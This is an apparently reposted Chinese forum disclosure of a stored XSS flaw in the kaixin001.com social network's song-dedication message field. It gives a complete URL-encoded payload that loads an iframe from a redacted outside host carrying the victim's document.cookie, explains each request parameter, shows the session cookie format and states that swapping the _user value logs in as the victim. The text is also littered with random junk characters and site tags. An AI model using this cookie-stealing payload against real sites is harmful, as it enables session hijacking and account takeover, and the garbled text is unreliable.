開心網(kaixin001.com)XSS漏洞

 

    漏洞描述：
;S6p(T-h)E4m　　開心網(www.kaixin001.com)，當你在給好友點歌時，你可以留言，而開心對用戶留言的數據沒有進行嚴格過濾，導致攻擊者可以提交惡意代碼，進行跨站攻擊。攻擊者利用該漏洞可以盜取開心網用戶的cookie，然后利用Cookie欺騙冒充該用戶進行賬號登錄。危害嚴重。(?'K1S.D-x

http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1+U%R5G8V#c0q)y-B

,T"q,k:v;Z3y+P1r
　　verify參數作用是驗證用戶身份
m0Q"p!X+z+A8x+fTechWeb-技術社區　　musicid參數是給好友點播歌曲的ID號
$^9Y1\!a$e$S　　musichost是自己的開心網IDtech.techweb.com.cn7K,|5f-U%})I9t%F*A
　　orderuids是好友開心網ID;_*q9d/r$e(R/W.^
　　word是點歌時留言內容TechWeb-技術社區 h2I0s/k5C)T1i2L
　　group 用戶組tech.techweb.com.cn1z9H+C!@/p$r(o
　　quiet 悄悄地(將不會出現在好友的動態中)
2W8Y)\"L2I,P1M　　word參數后可以加入精心構造的跨站代碼。3Q.r2m3Y;q6y2H$b
　　盜取Cookie提交代碼：
7_%q:u.h,}+y-q'n7p+e程序開發，操作系統，服務器，源碼下載，Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇

<img src="x" >tech.techweb.com.cn9Y"}1d t8u9H+s

-O%[#M)^9V
　　這段明文盜取COOKIE代碼，你要轉化為URL編碼后再提交。TechWeb-技術社區!s/P8]/V+q-b
　　當點歌成功后，惡意代碼將以系統消息的形式，發送給受害者。系統會告訴受害者，你的朋友×××給你點了一首歌。 }/W/U.{2u
　　開心網的COOKIE(其實是Session)格式如下:
;Y'g;`7O(W(p

SERVERID=_srv102-125_; 0[4c"M1Z*n k!@,d6t_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;:p%q1};a)y1e'n _email=×××××%40126.com; _invisible=0TechWeb-技術社區5C"f%v/]'K.\#p%N.]

TechWeb-技術社區!Y&v'~&f$m5a']6`
　　你只要把_user中的參數替換掉，就可以利用受害者的帳號進行登錄了。